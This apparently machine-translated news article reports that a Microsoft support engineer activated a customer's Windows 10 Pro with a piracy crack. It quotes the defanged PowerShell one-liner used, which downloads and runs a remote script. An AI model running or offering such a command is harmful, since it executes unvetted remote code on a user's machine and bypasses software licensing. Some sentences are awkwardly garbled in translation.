A Microsoft support engineer resorted to the simple solution of installing an unofficial pirated version of Windows on a customer's computer after the genuine copy of the operating system refused to activate properly.
And it seems that this is not the first time that Microsoft technical professionals have used this kind of workaround either, when they are under pressure to close a support issue in a timely manner!. He has a headache, he cuts his head.
The incident took place in South Africa when a developer named Wesley Pyburn paid $200 for a genuine copy of Windows 10 Pro and wanted to install it. Seeing that there are malfunctions during their activation, he called Microsoft support to perform the activation.
Imagine his surprise when watching the official Microsoft technician, he saw him "jacking" his copy using unofficial tools that bypass the Windows activation process!!.
But the customer was not random. As a developer he manages various online channels, such as TCNO (TroubleChute & TechNobo), and raised the issue. He explains on Twitter what happened:
"I can not believe it. Microsoft Windows 10 Pro official key could not be activated. Support couldn't help me yesterday.
Today was okay. Official Microsoft Support connected via Quick Assist and ran a command to activate Windows… AND AYTHN WAS ENA CRACK.”
Microsoft Activation on Windows and Office products is a Microsoft DRM technology to ensure that users are using the company's genuine products as opposed to pirated versions and that they comply with their license terms.
Windows XP era users may remember it Windows Genuine Advantage (WGA), a validation process that Microsoft used to automatically "disable" pirated copies of the operating system.
Microsoft's official Windows activation methods include either entering a 25-character product key when prompted, or signing in with your Microsoft account to apply a digital license. In some cases, customers can also call customer service for “phone activation".
Instead, "cracked" versions of Windows and stolen product keys are commonly used by users who want to use pirated software, which is prohibited both by the company's licensing terms and by law in most countries.
The Microsoft support engineer in this case ran the following PowerShell command on the customer's Windows computer (the URL has been slightly modified for obvious reasons):
irm hxxps://massgrave[.]dev/get | iex
The command creates a connection to massgrave.dev, an unofficial one Windows repository and Office that can fool most products and the protections they have.
In addition, the Invoke-Expression command (see iex) executes the download script, as shown in the image below:
Crack, warez, pirated software and how to "crack" Windows
Using "warez", "crack" and other unofficial means to bypass software copy protection is illegal. Besides falling into a gray area bordering on pirated software, these methods also pose a security risk. For example, third-party scripts that claim to break a program's protection may be malware.
Wesley Pyburn wanted to investigate the matter a little deeper, so he reached out to the Massgrave staff via Discord asking if he currently has cracked Windows. Not only did they answer his question in the affirmative, but they further claimed that it wasn't the first time they'd heard of a Microsoft engineer doing something like this.
Microsoft, after all this fuss, updated and contented itself with the following announcement:
“We strive to provide best-in-class support to our customers. The technique you described would be against our policy.
We are investigating this incident and will take appropriate action to ensure that proper customer support procedures are followed for our products and services."